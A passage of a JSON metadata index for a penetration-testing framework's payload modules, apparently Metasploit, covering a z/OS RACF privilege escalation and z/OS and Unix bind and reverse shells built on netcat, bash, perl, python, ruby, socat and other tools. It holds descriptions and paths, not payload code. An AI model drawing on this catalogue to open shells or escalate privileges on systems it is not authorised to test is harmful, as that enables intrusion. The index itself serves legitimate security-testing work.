"description": "(Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.)",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": 21,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/apf_privesc_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/bind_shell_jcl": {
"name": "Z/OS (MVS) Command Shell, Bind TCP",
"full_name": "payload/cmd/mainframe/bind_shell_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Provide JCL which creates a bind shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 16:52:36 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/bind_shell_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/generic_jcl": {
"name": "Generic JCL Test for Mainframe Exploits",
"full_name": "payload/cmd/mainframe/generic_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Provide JCL which can be used to submit\n a job to JES2 on z/OS which will exit and return 0. This\n can be used as a template for other JCL based payloads",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/generic_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/reverse_shell_jcl": {
"name": "Z/OS (MVS) Command Shell, Reverse TCP",
"full_name": "payload/cmd/mainframe/reverse_shell_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Provide JCL which creates a reverse shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 18:27:29 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/reverse_shell_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_awk": {
"name": "Unix Command Shell, Bind TCP (via AWK)",
"full_name": "payload/cmd/unix/bind_awk",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"espreto <robertoespreto@gmail.com>",
"Ulisses Castro <uss.thebug@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell via GNU AWK",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-16 04:06:58 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_awk.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_awk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_busybox_telnetd": {
"name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)",
"full_name": "payload/cmd/unix/bind_busybox_telnetd",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Matthew Kienow <matthew_kienow[AT]rapid7.com>"
],
"description": "Listen for a connection and spawn a command shell via BusyBox telnetd",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-03 18:43:51 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_busybox_telnetd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_inetd": {
"name": "Unix Command Shell, Bind TCP (inetd)",
"full_name": "payload/cmd/unix/bind_inetd",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell (persistent)",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_inetd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_lua": {
"name": "Unix Command Shell, Bind TCP (via Lua)",
"full_name": "payload/cmd/unix/bind_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Listen for a connection and spawn a command shell via Lua",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_netcat": {
"name": "Unix Command Shell, Bind TCP (via netcat)",
"full_name": "payload/cmd/unix/bind_netcat",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"m-1-k-3",
"egypt <egypt@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_netcat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_netcat_gaping": {
"name": "Unix Command Shell, Bind TCP (via netcat -e)",
"full_name": "payload/cmd/unix/bind_netcat_gaping",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_netcat_gaping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_netcat_gaping_ipv6": {
"name": "Unix Command Shell, Bind TCP (via netcat -e) IPv6",
"full_name": "payload/cmd/unix/bind_netcat_gaping_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_nodejs": {
"name": "Unix Command Shell, Bind TCP (via nodejs)",
"full_name": "payload/cmd/unix/bind_nodejs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Continually listen for a connection and spawn a command shell via nodejs",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-10-11 11:09:28 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_nodejs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_perl": {
"name": "Unix Command Shell, Bind TCP (via Perl)",
"full_name": "payload/cmd/unix/bind_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_perl_ipv6": {
"name": "Unix Command Shell, Bind TCP (via perl) IPv6",
"full_name": "payload/cmd/unix/bind_perl_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_perl_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_r": {
"name": "Unix Command Shell, Bind TCP (via R)",
"full_name": "payload/cmd/unix/bind_r",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Continually listen for a connection and spawn a command shell via R",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_r",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_ruby": {
"name": "Unix Command Shell, Bind TCP (via Ruby)",
"full_name": "payload/cmd/unix/bind_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_ruby_ipv6": {
"name": "Unix Command Shell, Bind TCP (via Ruby) IPv6",
"full_name": "payload/cmd/unix/bind_ruby_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_ruby_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_socat_udp": {
"name": "Unix Command Shell, Bind UDP (via socat)",
"full_name": "payload/cmd/unix/bind_socat_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an interactive shell via socat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_socat_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_stub": {
"name": "Unix Command Shell, Bind TCP (stub)",
"full_name": "payload/cmd/unix/bind_stub",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell (stub only, no payload)",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-28 16:21:37 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_stub.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_stub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_zsh": {
"name": "Unix Command Shell, Bind TCP (via Zsh)",
"full_name": "payload/cmd/unix/bind_zsh",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Doug Prostko <dougtko@gmail.com>",
"Wang Yihang <wangyihanger@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\n often available, please be aware it isn't usually installed by default.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 19:42:39 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_zsh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/generic": {
"name": "Unix Command, Generic Command Execution",
"full_name": "payload/cmd/unix/generic",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Executes the supplied command",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/generic.rb",
"is_install_path": true,
"ref_name": "cmd/unix/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/interact": {
"name": "Unix Command, Interact with Established Connection",
"full_name": "payload/cmd/unix/interact",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Interacts with a shell on an established socket connection",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/interact.rb",
"is_install_path": true,
"ref_name": "cmd/unix/interact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse": {
"name": "Unix Command Shell, Double Reverse TCP (telnet)",
"full_name": "payload/cmd/unix/reverse",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell through two inbound connections",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_awk": {
"name": "Unix Command Shell, Reverse TCP (via AWK)",
"full_name": "payload/cmd/unix/reverse_awk",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"espreto <robertoespreto@gmail.com>",
"Ulisses Castro <uss.thebug@gmail.com>",
"Gabriel Quadros <gquadrossilva@gmail.com>"
],
"description": "Creates an interactive shell via GNU AWK",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-16 04:06:58 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_awk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_bash": {
"name": "Unix Command Shell, Reverse TCP (/dev/tcp)",
"full_name": "payload/cmd/unix/reverse_bash",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell via bash's builtin /dev/tcp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/tcp feature.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-10 18:34:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_bash",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_bash_telnet_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (telnet)",
"full_name": "payload/cmd/unix/reverse_bash_telnet_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via mkfifo and telnet.\n This method works on Debian and other systems compiled\n without /dev/tcp support. This module uses the '-z'\n option included on some systems to encrypt using SSL.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 20:50:30 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_bash_telnet_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ksh": {
"name": "Unix Command Shell, Reverse TCP (via Ksh)",
"full_name": "payload/cmd/unix/reverse_ksh",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Wang Yihang <wangyihanger@gmail.com>"
],
"description": "Connect back and create a command shell via Ksh. Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 19:56:55 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ksh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_lua": {
"name": "Unix Command Shell, Reverse TCP (via Lua)",
"full_name": "payload/cmd/unix/reverse_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Creates an interactive shell via Lua",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ncat_ssl": {
"name": "Unix Command Shell, Reverse TCP (via ncat)",
"full_name": "payload/cmd/unix/reverse_ncat_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"C_Sto"
],
"description": "Creates an interactive shell via ncat, utilizing ssl mode",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ncat_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_netcat": {
"name": "Unix Command Shell, Reverse TCP (via netcat)",
"full_name": "payload/cmd/unix/reverse_netcat",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"m-1-k-3",
"egypt <egypt@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Creates an interactive shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 18:00:02 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_netcat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_netcat_gaping": {
"name": "Unix Command Shell, Reverse TCP (via netcat -e)",
"full_name": "payload/cmd/unix/reverse_netcat_gaping",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 18:00:02 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_netcat_gaping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_nodejs": {
"name": "Unix Command Shell, Reverse TCP (via nodejs)",
"full_name": "payload/cmd/unix/reverse_nodejs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Continually listen for a connection and spawn a command shell via nodejs",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_nodejs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_openssl": {
"name": "Unix Command Shell, Double Reverse TCP SSL (openssl)",
"full_name": "payload/cmd/unix/reverse_openssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell through two inbound connections",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_openssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_perl": {
"name": "Unix Command Shell, Reverse TCP (via Perl)",
"full_name": "payload/cmd/unix/reverse_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"cazz <bmc@shmoo.com>"
],
"description": "Creates an interactive shell via perl",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_perl_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via perl)",
"full_name": "payload/cmd/unix/reverse_perl_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via perl, uses SSL",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_perl_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_php_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via php)",
"full_name": "payload/cmd/unix/reverse_php_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via php, uses SSL",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-19 15:49:46 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_php_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_python": {
"name": "Unix Command Shell, Reverse TCP (via Python)",
"full_name": "payload/cmd/unix/reverse_python",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "Connect back and create a command shell via Python",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_python",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_python_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via python)",
"full_name": "payload/cmd/unix/reverse_python_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_python_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_r": {
"name": "Unix Command Shell, Reverse TCP (via R)",
"full_name": "payload/cmd/unix/reverse_r",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via R",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_r",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ruby": {
"name": "Unix Command Shell, Reverse TCP (via Ruby)",
"full_name": "payload/cmd/unix/reverse_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Connect back and create a command shell via Ruby",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ruby_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via Ruby)",
"full_name": "payload/cmd/unix/reverse_ruby_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via Ruby, uses SSL",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ruby_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_socat_udp": {
"name": "Unix Command Shell, Reverse UDP (via socat)",
"full_name": "payload/cmd/unix/reverse_socat_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an interactive shell via socat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_socat_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ssl_double_telnet": {
"name": "Unix Command Shell, Double Reverse TCP SSL (telnet)",
"full_name": "payload/cmd/unix/reverse_ssl_double_telnet",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>",
"RageLtMan"
],
"description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option",
"references": [
],
